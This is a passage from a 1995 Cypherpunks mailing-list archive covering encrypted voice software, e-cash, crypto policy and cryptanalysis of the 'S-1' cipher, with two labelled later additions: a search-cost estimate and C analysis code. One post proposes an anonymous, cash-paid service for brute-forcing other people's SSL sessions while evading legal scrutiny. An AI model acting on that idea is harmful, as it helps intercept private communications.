can get them as low as $50 (with RPI) or $70-80 for full functionality.
28.8K modems can be bought for $150. 

  The problem with PGPFone as I see it, is that it's an application and not
an application to a protocol. To get voice encryption in large scale
use will require several things IMHO

1) performance is reasonable
2) user interface is very easy to use, as easy as using a walkie talkie
     with a key
3) software is very easy to set up (no knowledge of hayes commands required,
no editing of slip configuration, etc)


Finally, even that is not going to drive the system into a de facto
ubiquitous standard unless

4) a complete, easy to read specification of the protocol used is
   published (perhaps as an RFC)
5) third party applications that use the protocol evolve. 

#5 is needed because competition between applications writers will
improve the human interface of the software beyond what the PGP
authors can design. (who are more likely algorithm specialists, 
not human interface people)

6) network independent
   this will be a benefit to people who want to make long distance calls
over data networks. it could also be used by companies for secure 
teleconferencing.


I would like to see a secure voice communication protocol that is divorced
from the particular details of the algorithms used (although a 
base level of some voice compression technique + DES + RSA will have to
be used) That way, new and better algorithms can be dropped in depending
on the network used (modem, ipx, tcp/udp, etc) and the bandwidth required
(CELP vocoder, MPEG-audio, lossless encoding, progressive PCM, etc)


-Ray

  

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Fri, 11 Aug 95 15:17:44 PDT
To: rjc@clark.net
Subject: PRZ encrypted voice software release imminent
In-Reply-To: <199508111816.OAA05222@clark.net>
Message-ID: <199508112143.OAA02837@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain



>   If you are forced to abstract above "modems", your algorithms will
>   be designed to work over more general transmission schemes. I fear
>   that coding for modems first will lead to an overall application tuned for
>   modems, but poorly designed for asynchronous networks. The tuning should
>   be done in the driver, not the application/algorithm level. 
>   (for example, modems don't experience much "packet churn and loss",
>   and they usually have a dependable bandwidth. Even if they retrain
>   randomly from 28.8 to 14.4, they can still be counted on to at least have
>   9600 bps throughput more consistently deliverable than say a slip/ppp line 
>   would)

asynchronous networks are a completely different beast than your basic
point-to-point phone call.  Over.

If you expect people to use a secure voice communication device,
they've got to like it.  Over.

I don't know anybody who prefers more latency.  Over.

I think that it makes great sense to optimize for a point-to-point
connection.  I also believe that it should be an un-error corrected
channel (no V.42 or V.42bis) since many speech coders can tolerate
the errors.

Knowing the channel characteristics also allows you to tailor your
crypto usage.  If you know you've got a raw synchronous channel, and
Pr(bit insert or bit delete) << Pr(bit error) then you can avoid a lot
of overhead.  This does matter where bandwidth is tight.  Say,
sticking a 13,000 bit/s coder down a 14,400 bit/s pipe.  With GSM's
260 bit frame every 20ms, it leaves 28 bits per frame for all
overhead.  This includes any forward error correction, sync
maintenance, crypto IV's etc.  You can't tune this in the driver.

None of this says that you shouldn't also optimize for the packetized
case too.  I think that you can negotiate the right behavior at start
up time based on detected channel characteristics.  I think that the
biggest impact is in the framing overhead, or lack of it.

You are always trading off bandwidth, speech quality and MIPs.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Fri, 11 Aug 95 11:46:40 PDT
To: cypherpunks@toad.com
Subject: Bay Area Meeting This Weekend?
Message-ID: <Pine.SUN.3.91.950811144404.27170B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm just about to fly out to San Francisco, and I realized that coming up 
is the second Saturday of the month, the traditional meeting time for the 
Bay Area Cypherpunks.  I haven't seen any meeting announcements, so 
please e-mail me if there's one scheduled (and if you can give a ride 
from S.F. if so!).  I've just temporarily unsubscribed (I'll catch up on 
the archives when I return), so please cc me if you announce the meeting  
to the list.

Thanks,

Joe Thomas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatjana vonBernhardi <tatjana@polaris.mindport.net>
Date: Fri, 11 Aug 95 11:52:34 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Bank Fees and E-Cash
In-Reply-To: <Pine.SUN.3.91.950809190129.17834A-100000@access5.digex.net>
Message-ID: <Pine.SUN.3.91.950811144359.194A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Aug 1995, Black Unicorn wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - - - Bank Fees and the E-cash Niche.
> 
> Banks have gorged themselves on rocketing fees for the last five 
> years.  The result is that typical bank customer currently pays 
> 150% of the amount of interest collected on accounts in a given 
> year in the form of fees.  My prediction, and my hope, is that e-
> cash will cut through the pretense upon which the rationalization 
> of many of these fees is based, and even market itself on this 
> point- Lower Fees.
> 

you have surpassed yourself in assumption here A,

your hope that e-cash will somehow reduce bank fees is a long stretch.
banks like their fees and the massive profits they pull too much to cut 
this part out.  they will likely charge more for the great gift of e-cash 
as if it were some special feature.
> 
> I cannot believe that e-cash won't be able to solve some of these 
> problems, and I hope it will limit its own fees to usage.  To me 
> this is a classic argument for small house e-cash shops.  Citibank 
> and Mastercard are going to fight for their fees.

how will small shops hope to run with consumer titans like citibank and 
such?  all they need to do is announce something nifty like the "electric 
purse" and call it e-cash and the market is closed.
> 
> 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
> E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
> *New Key Information*    -    Finger for key revocation and latest key update.
> 


XXX's & OOO's anyhow  =)

     +tat

--
www.mindport.net/~tatjana 
"Life... is a state of mind."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Fri, 11 Aug 95 07:07:41 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111336.JAA05910@clark.net>
Message-ID: <199508111406.PAA10668@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:

| Unix: can be used through either /dev/tty?? or Socket (probably want
| to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
| (audio devices are all proprietary)

AudioFile could be one way around the proprietary audio device 
problem - have a look for "AF" on archie

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 07:14:33 PDT
To: kinney@bogart.Colorado.EDU ("W. Kinney")
Subject: Re: SSL bruting progress
Message-ID: <10188.9508111413@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Will Kinney <kinney@bogart.colorado.edu> writes on cpunks:
> > We've not managed to isolate the cause of it, as (two people) have
> > nearly swept the entire keyspace (heh they had a bit of spare compute)
> > and no key has been forthcoming so far.
> 
> Um, if you're going to sweep the whole space yourself before you release
> the code, what's the point in a public sweep? 

Surety.

Nothing as disappointing as throwing all your spare compute joyfully
into such a fun cpunk project, and then finding no key comes from it.
Witness the RC4 bruting, which lots of folks thought fun, but
unfortunately (well it should have been expected, and it was in part,
as there were no specs, all we knew was microsoft said it was RC4 in
some way, nothing more) no key.

Also the private sweeping wasn't planned, just Eric Young said, hey
I've started at 8000 I'll sweep up from there till you're ready.
(Eric already had his own SSL bruting code).  Then David Byers asked
for a copy of Andrew Roos brute ssl to port to the maspar he has
access to, and next thing he said, hey I got it working at 1.5M
keys/sec and left it running, it'll reach Eric's start in a couple of
days.  As it turned out that they haven't found anything yet, their
keysweeping is going to be very useful to figure out what's wrong.
It's much harder to track down problems, accidentally unswept keyspace
etc, when there are 100s of sweepers.

Anyway, when we're as sure as we can be that it will work, we'll
probably try to persuade Hal for another sample session.  So that it
will be a challenge, that we don't know the answer for.

Perhaps it would be fun to have a regular key crunching ring set up
once it's all verified, and proven to work.  Part of the problem with
this is the legal implications, you probably can't expect to get away
with breaking SSL sessions no questions asked - give us a SSL session
key startup and we'll brute it - at least not openly.  A central key
distribution point kind of blows this, as it gives legal beagles
somebody to go after.

The other key distribution architecture, is an unknown machine out
there somewhere in cyberspace :-) Ie a blacknet style address and 2048
bit public key:

	brute@cyberspace.nil

with a charge levied in anon digital cash.  A sweepstake perhaps, he
who hits the key first gets the anon digital cash remailed to him (tax
free of course).

An architecture resilient to interference on both legal and
ill-meaning key-sweepers sides (the possibility exists for someone to
reserve keyspace and not sweep it) is to just search randomly.  Very
simple architecture, but somewhat wasteful of resources, least likely
to be detected, as there is less communication.  One drop off of 'the
session' to cpunks, and another of the result by the euphoric lucky
person who happened to start in the right place.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365
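
The cost of the random-search architecture described in the message above can be put in numbers. This is an added worked estimate, not part of the original post. It assumes a keyspace of $N$ keys with exactly one correct key, and it models uncoordinated sweepers as independent uniform draws with replacement (an assumption; sweepers that start at random offsets and run sequentially overlap in a similar way).

Coordinated sweep, every key tested at most once, correct key uniformly placed:

\[
E[T_{\text{sweep}}] = \sum_{k=1}^{N} k \cdot \frac{1}{N} = \frac{N+1}{2}
\]

Random search, each test succeeding independently with probability $1/N$ (geometric distribution):

\[
E[T_{\text{random}}] = N, \qquad
\Pr[\text{no hit after } cN \text{ tests}] = \left(1 - \frac{1}{N}\right)^{cN} \approx e^{-c}
\]

Under this model the random search costs about twice the expected work of a coordinated sweep. After a full keyspace worth of tests ($c = 1$) the key is still unfound with probability about $e^{-1} \approx 0.37$, whereas the coordinated sweep is certain to have found it.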





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@wwa.com>
Date: Fri, 11 Aug 95 13:17:57 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111759.KAA05515@netcom8.netcom.com>
Message-ID: <Pine.LNX.3.91.950811151053.2010A-100000@ts07.neiu.bgu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 11 Aug 1995, Vladimir Z. Nuri wrote:

> the real holy grail for voice communication encryption is
> when this stuff starts to get integrated into the real 
> phone system, or people start making hardware that is
> cheap and self contained and idiot proof. "but it's difficult
> to make anything foolproof, because fools are so ingenious" <g>
>
This can be done with hacked telephones probably.  A switch in the 
telphones that then takes the line over turning it into a data connection 
and negotiating keys etc.. with the remote side which would have a 
similiarly equipped telephone.  It may already be done, but rather 
prohibitevly expensive for common use.
 
> this is an extremely useful model: "big fish provider" gives
> a capability that people want, namely processing time and
> disk space. they think they can regulate the uses of their
> system, but if there is enough degrees of freedom, they 
> cannot, and people can actually simulate the services they
> want on the system regardless of what the system operators
> wish to control or not control.
>
not true really, most providers shut off accounts that run SLIRP if they 
also offer SLip/PPP service to customers. I know MCSnet did.  but 
SLIP/PPP was only five dollars more a month and offered much better 
performance.
 

"I regret that I have but six orifices to give you" -Nesta Stubbs
/-/ a s t e  http://www.mcs.net/~nesta/home.html Angeli Caduti Assasin


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCueoDMPw/Yr5YDZAQEfRgQAjmBFu4Oqg4XhIh+pG2/smvP7Eg8/cHP/
bgrtErzQudyjre5Bxind0AK54fGdsJf21kZK0BESxgspA9+K5w/970UfyVFTwIaL
LTQgSdqezyMx3S0HMJYoWvH5xJ3sOmHMGnq7n3hQVFoBMaVCfvUnUiUJodPr5Wd0
/TXBL5TSUSM=
=6qJf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wmono@Direct.CA (William Ono)
Date: Fri, 11 Aug 95 15:32:04 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: your mail
Message-ID: <199508112229.PAA17698@mail.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


At 02:28 PM 08/11/95 -0400, K. M. Ellis wrote:
>SHUT UP.
>

That was entirely useless.  1) You directed your mail to a dummy address
representing an anonymous remailer.  2) You wasted even more bandwidth,
time, and disk space by posting yet another useless post to cypherpunks.

Please note the To: and Cc: fields carefully next time you address a mail!

--
William Ono <wmono@direct.ca>                                     PGP 2902B621
 fingerprint = 51 6B BC 81 57 D8 FF 6A  5A A1 A4 6B 9A E3 E5 EE = fingerprint
PGP-encrypted mail welcome!                              Witty Quote Goes Here






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 07:37:00 PDT
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: Australia, EU crypto ill news, crypto wars
Message-ID: <10374.9508111435@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > a) Lobbying - hopeless IMO, they aren't interested in listening, the
> >    politicos are just too easy to manipulate and the "masses" aren't
> >    clueful enough of what crypto means to understand the implications,
> >    or even notice.
> 
> The "masses" are not that clueless (remember the 80% against Clipper
> in a US poll a year ago). 

It depends how it is packaged to the voter, if it is even presented at
all (as you note below so much gets quietly swept through, and
presented fait accompli once they've already signed some euro deal).

The US at least makes a token of having public debate, I wouldn't be
surprised to see little to no coverage of this in the UK for instance.
If it was worded as 'government wants to force taps on all your
phones' as presumably the clipper vote was, then you might get a
reaction, but if it's worded as a way to keep tabs on all those evil
child pornographers who teem in the countless millions on the internet,
well it's not so easy to convince people.  Some folks still have a
mistaken belief that because that nice police man says that we need to
do this to protect our children then it is so.

Also note that Clipper wasn't completely quashed, Clinton elected to
use it for government contractors, and government official business
where crypto would be used, by presidential decree.  Not a very
democratic move, and still a ploy to get the thing accepted by
misspent government money in creating a market for the things, and
mandating its use in defense contracting work for the government.

> The problem 'here' in the EU is the smartly construed distance
> between commons and rulers. We vote for members of a debate club
> (who are very generously paid out of tax money) lacking any power
> whatsoever. The EU decision on crypto-policy will emerge from closed
> chambers of the Commission, and in every member country the local
> politicians will announce that 'it has been decided by EU and there
> is nothing we can do about it, even if we would like to'.

Sure that's exactly the approach taken to ram these things down our
throats without public debate.

> But this doesn't mean that national freedom-of-(crypto)speech
> campaigns will be useless.  Civil disobedience, still very common
> amongst European citizens faced with ridiculous EU regulations, will
> be more likely to thrive if the legitimacy of crypto regulations is
> publically questioned in a continuous mode.

Civil disobedience is a nice way to protest obvious nonsense, of
course, but doesn't help financial institutions who will be by law
required to use escrowed encryption with the AU govt holding the keys
(in the case of the AU example government current line).  Where's your
privacy then?  You must fight for it, whilst your very efforts are
illegal, and these ludicrous laws can then be selectively enforced
depending on the whims of some arbitrary power.

> A significant difference between (for example) Sweden and USA is the
> punishment scales. Suppose Sweden had an ITAR (which it
> hasn't). Almost everyone would laughingly export PGP and Wei's
> library anyway, because the remote possibility of prosecution
> (assuming similarities with the current situation in the US) would
> hardly feel like a threat. A conviction would result in a few 100$
> fine, maximum. 

Liveable, as you could view it as a 'freedom tax', but unjust.

> An *enforced* ban on crypto in Scandinavia is remote enough that I'm
> confident 'SuperStego for Windows' will be out in ver 7.3b by then.

Well there's several issues: should they be allowed to do this (no
way), and will they get away with it in the current level of crypto
awareness (probably IMO), and will it be an effective deterrent
(depends, the US one seems to keep US companies out of crypto, even
though it has probably aided rather than hindered PGPs popularity),
and is it enforceable (well ultimately no, due to good stego - your
'SuperStego for Windows' v 7.3b).

If your confidence in Sweden's resistance to big brotheresque crypto
regs is justified, well perhaps a bevy of political thought criminals
will come live in Sweden to escape their own repressive regimes.  How's
the job market for unix hackers?

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbryan@maroon.tc.umn.edu (Steve Bryan)
Date: Fri, 11 Aug 95 14:01:11 PDT
To: "Vladimir Z. Nuri" <shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02130505ac515bae047a@[134.84.101.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 am 8/11/95, Vladimir Z. Nuri wrote:
[snip]
>>I can't violate my NDA, but PGPFone will be a *major* revolution for
>>communication security. I would not be surprised to see several hundred
>>thousands of users. PGP will pale in comparison.
>
>I sincerely doubt this. if someone could find a way of doing 
>voice encryption through simple idiotproof hardware adapters
>(I am thinking of cups that you could attach to any standard phone)
[snip]

Am I one of the few who thinks that PGPFone is the biggest CypherPunk
event for years? I think it will be even more significant if we get
strong encryption built into the low level infrastructure of Internet
as Perry and others are pursuing but that isn't an event that will be
big news next week. A lot of people who don't usually think or talk
about fundamental issues of privacy and technology will be doing so
next week. I hope that some of the people here who have contacts in
the press are ready to say useful and clarifying things to reporters
who would be just as happy to concentrate on usual suspects (drug
dealers, et al).

On the speculation of attaching cups to a standard phone I think this
has an air of unreality. To apply strong encryption you need a digital
signal. That doesn't necessarily imply a computer but sufficiently
powerful computers are going into people's homes at an astonishing
rate already. I use MegaPhone on my Quadra 660av at home and I can't
wait to try out PGPFone. Even without PGPFone I have thought for a
while that computer based telephony is getting ready to take off.
Combining CallerID, customized call handling, high quality
speakerphone capability and a truly useful personal directory
(TouchBase Pro is too sluggish, but getting there) there were already
the ingredients of substantive usefulness. If you can add in street
maps fetched with an AppleEvent or even a QTVR enhanced map then you
get something that might make even an AT&T ad envious. Adding complete
privacy (relative to previous levels available) and possibly
authentication makes this a very big event.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lat@iac.net (Lynn TerWoerds)
Date: Mon, 14 Aug 95 17:39:16 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <v01520d00ac50f4fd6327@[199.6.41.57]>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous remailer? What a crock! In my book, you might as well have
written this rant on swift moving water or the wind.

Lynn TerWoerds
Cincinnati, OH






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 11 Aug 95 15:09:17 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111759.KAA05515@netcom8.netcom.com>
Message-ID: <Pine.BSI.3.91.950811164809.28774C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Aug 1995, Vladimir Z. Nuri wrote:

> 
> when someone invents cheap hardware that you can just plug
> on top of any existing phone, i.e. "the phone adaptor", TPA?,
> *that's* when the world is going to go crazy with crypto.

It's closer than you think.  I've been messing with TI's 
Digital Signal Processing DSK.  For $99 you get a DSP
with audio in, audio out and 10k of memory.  Reference
implementations of : DTMF encoders/decoders; 300, 1200, 2400 baud
modem programs; and voice processing software already exist.

The TI Linear Products Transmission, Switching, Subscriber,
and Transient Suppressors Data Book is sitting on my desk
along with the Data Transmission and Control Circuits (etc)
Data Book.  Combined with the pinouts and software that
came with DSP DSK I've been painfully trying to piece
together how one might glue up a telephone interface.

Unfortunately, I'm a software guy and am still learning.

In any case, assuming Joe STUD Hardware Guy was willing
to make a daughterboard with a 64k memory module (10k is
just not enough) with an FCC approved telephone interface
(available from parts suppliers).  You could have a 25 MIPS
based personal STU.  I'm envisioning a 'black box' with
two RJ-11 jacks which daisy chained in with your phone
like a modern modem.  Triggering key exchange could be
a simple DTMF sequence.  

Ultimately, the device could be combined into a single
board eliminating parts, reducing space, and lowering
power supply requirements.  The DSP DSK currently needs
~14 Volts AC.   I'd like to see that black box
portable and able to use some nine volt or AA batteries.



> all this stuff that requires lots of hardware can be used,
> but the thing that will cause *everyone* to use it is when
> someone invents a TPA. I'm very, very surprised that no 
> one has tried to do this yet.
> 

In any case, I'm trying to do it, but my efforts will never
realise a commercial result.  I just don't have the money
to buy parts in bulk, and without doing that units would be
$200-$500 each.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 11 Aug 95 14:24:45 PDT
To: hfinney@shell.portal.com
Subject: Re:  More "S-1" foolishness
In-Reply-To: <199508111809.LAA02095@comsec.com>
Message-ID: <9508112119.AA13790@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 10 Aug 1995 20:53:58 -0700
>From: Hal <hfinney@shell.portal.com>
>
>The other thing I noticed that really makes me question this is that G1
>only uses 4 of its 8 input bits.  As I wrote, it is equivalent to
>parity(i&0x17).  A bit is a terrible thing to waste, and it is hard to
>imagine why it would do this intentionally.  G1 may not be that important
>an element of the cipher but why throw away four bits?

Not that I say this is real, but...

I can maybe understand throwing out 4 of the bits if G0 picks them up.  G1
is never used alone.

However, has anyone already noted that

	fullkey[INTEGRITY][i][j] = 0x08 ;

for all i and j?

For that matter, fullkey will be a constant for any key with all the bytes
the same.  This might constitute a class of weak keys.


 - Carl
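
Added example (not part of the original message, and not code from the S-1 posting): one way to check a claim like the quoted one, that an 8-bit-to-1-bit function equals parity(i&0x17) and so uses only 4 of its input bits. The G1 table itself is not reproduced in this archive, so `g1_model` is built from the quoted formula; all function names here are assumptions, and the affine test generalizes beyond this one mask.

```c
#include <stdint.h>
#include <stdio.h>

typedef unsigned (*bool8_fn)(uint8_t);

/* XOR of all eight bits of v. */
static unsigned parity8(uint8_t v)
{
    v ^= v >> 4;
    v ^= v >> 2;
    v ^= v >> 1;
    return v & 1u;
}

/* Model of G1 as described in the quoted message: parity(i & 0x17).
 * Constructed from that formula; not the table from the S-1 posting. */
static unsigned g1_model(uint8_t i) { return parity8(i & 0x17); }

/* Constructed contrast case: AND of the two low bits, which is non-linear. */
static unsigned and_low2(uint8_t i) { return (i & 1u) & ((i >> 1) & 1u); }

/* Build the full 256-entry truth table of f. */
static void tabulate(bool8_fn f, uint8_t table[256])
{
    for (int x = 0; x < 256; x++)
        table[x] = (uint8_t)(f((uint8_t)x) & 1u);
}

/* Mask of input bits that influence the output: bit b is set if flipping
 * input bit b changes the output for at least one input x. */
static uint8_t used_bits(bool8_fn f)
{
    uint8_t table[256], mask = 0;
    tabulate(f, table);
    for (int b = 0; b < 8; b++) {
        for (int x = 0; x < 256; x++) {
            if (table[x] != table[x ^ (1 << b)]) {
                mask |= (uint8_t)(1u << b);
                break;
            }
        }
    }
    return mask;
}

/* If f(x) == parity(x & mask) ^ c for every x (an affine function over
 * GF(2)), return mask; otherwise return -1. The candidate mask is read
 * off the single-bit inputs, then verified against all 256 entries. */
static int affine_mask(bool8_fn f)
{
    uint8_t table[256], mask = 0;
    tabulate(f, table);
    unsigned c = table[0];
    for (int b = 0; b < 8; b++)
        if (table[1 << b] != c)
            mask |= (uint8_t)(1u << b);
    for (int x = 0; x < 256; x++)
        if (table[x] != (parity8((uint8_t)x & mask) ^ c))
            return -1;
    return mask;
}

/* Number of set bits in an 8-bit mask. */
static int popcount8(uint8_t v)
{
    int n = 0;
    for (; v; v >>= 1)
        n += v & 1;
    return n;
}

int main(void)
{
    uint8_t m = used_bits(g1_model);
    printf("g1_model: used-bit mask 0x%02x (%d of 8 bits), affine mask %d\n",
           m, popcount8(m), affine_mask(g1_model));
    printf("and_low2: used-bit mask 0x%02x, affine mask %d\n",
           used_bits(and_low2), affine_mask(and_low2));
    return 0;
}
```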




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 11 Aug 95 14:58:24 PDT
To: cypherpunks@toad.com
Subject: Still more "S-1" foolishness
Message-ID: <199508112206.SAA27354@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a table of where the expanded key schedule bits come from
(I think - this could be wrong, I had to tweak some of the output
by hand).  Note that some key bytes are used much more often, and
in more positions, than others, but every key byte does at least
end up being used as input to each F eventually (but not always to
each "target" byte).

Sorry for the opaque notation; this reads best when used in conjunction
with Colin's cool graph that he posted to sci.crypt last night.

-matt



   |    | G0   G1  F+0  F+1  F+2  F+3   (function input)
   bytes| 4    5    2    3    0    1    (mixed with byte #)
rou|enc-| all  all R+6L R+6H R+7L R+7H  (output affects)
nd |rypt| 0    1    2    3    4    5    (key schedule byte #)
 # |ed  |LLHH LLHH LLHH LLHH LLHH LLHH  (posn of orig key byte in sched byte)
======================================
 0  76   5954 9538 5495 4851 8515 5151
 1  54   1510 5194 1051 0415 4171 1717
 2  32   7176 1750 7617 5071 0737 7373
 3  10   3732 7316 3273 1637 6393 3939
 4  67   9398 3972 9739 7293 2959 9595
 5  54   5954 9538 5495 4851 8515 5151
 6  32   1510 5194 1051 0415 4171 1717
 7  10   7176 1750 7617 5071 0737 7373
 8  76   3732 7316 3273 1637 6393 3939
 9  54   9398 3972 9739 7293 2959 9595
10  32   5954 9538 5495 4851 8515 5151  (original key bytes used)
11  10   1510 5194 1051 0415 4171 1717
12  76   7176 1750 7617 5071 0737 7373
13  54   3732 7316 3273 1637 6393 3939
14  32   9398 3972 9739 7293 2959 9595
15  10   5954 9538 5495 4851 8515 5151
16  76   1510 5194 1051 0415 4171 1717
17  54   7176 1750 7617 5071 0737 7373
18  32   3732 7316 3273 1637 6393 3939
19  10   9398 3972 9739 7293 2959 9595
20  76   5954 9538 5495 4851 8515 5151
21  54   1510 5194 1051 0415 4171 1717
22  32   7176 1750 7617 5071 0737 7373
23  10   3732 7316 3273 1637 6393 3939
24  76   9398 3972 9739 7293 2959 9595
25  54   5954 9538 5495 4851 8515 5151
26  32   1510 5194 1051 0415 4171 1717
27  10   7176 1750 7617 5071 0737 7373
28  76   3732 7316 3273 1637 6393 3939
29  54   9398 3972 9739 7293 2959 9595
30  32   5954 9538 5495 4851 8515 5151
31  10   1510 5194 1051 0415 4171 1717




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 11 Aug 95 15:13:20 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: More "S-1" foolishness
In-Reply-To: <9508112119.AA13790@tis.com>
Message-ID: <199508112221.SAA27518@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>For that matter, fullkey will be a constant for any key with all the bytes
>the same.  This might constitute a class of weak keys.

Interestingly, though, such keys are not weak in the sense that the
all-zero/all-one key is weak in DES.  There doesn't seem to be any
obvious way to key it such that encryption == decryption.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 11 Aug 95 19:27:28 PDT
To: Bryan Strawser <cypherpunks@toad.com
Subject: Re: Nym Server Development....
Message-ID: <ac515e9d07021004af05@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've removed these from this follow-up: remailer-operators@c2.org,
nyms@sephiroth.org, alt.privacy.anon-server@canaima.ME.berkeley.edu)

At 2:04 AM 8/12/95, Bryan Strawser wrote:
>John Fleming, along with a bit of support help from myself, is developing
>a nym server that he is intending to release to the public once we are
>satisfied with the performance and the state of the code.

What is your working definition of "nym server"?


>At this point and time, John has pushed the code to the point where we
>have an experimental nym server operating that is being constantly
>refined and features added. Along the same lines, I am presently
>working on solid documentation for when the nymserver is ready for
>public use, and for the later public release of the code.
>
>John created a mailing list for those interested in contributing to the
>development of his nymserver and as a forum for discussion of nymserver
>related issues.  So far, there have been few folks subscribed, and no
>answer from those that are presently subscribed to the list.  I find
>this rather disappointing.

Maybe there's little interest because I can't find any threads that discuss
just what a "nym server" is. I can make some guesses as to what _I_ might
call a nym server, but there are some important issues (of who keeps the
records, and why a nym server is better than just using unforgeable sigs,
etc.) that need discussing.


>that are running today.  Just like the other types of anonymity out
>there, a nymserver has many viable reasons for existence.  The lack of
>publicly available code for such a server, as there is for remailers,
>should motivate us to get behind John and his efforts.

Why should we get behind an effort that has not been spelled out or
discussed here? Maybe I'm missing the debate in the groups I deleted (see
above), but I really don't know what it's about.

>To subscribe to the nymserver development & discussion forum, send
>a message to majordomo@sephiroth.org with the line "subscribe nyms
><your name>" in the body of the message.  Questions about the
>nymserver should be directed to that list so that all can be involved
>in the development.

Sorry, Bryan, but I don't typically join mailing lists so I can find out
what the subject of a mailing list is! :-}

Describe for us what you have in mind for "nym servers" and why they are
important, then maybe more folks will get involved.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
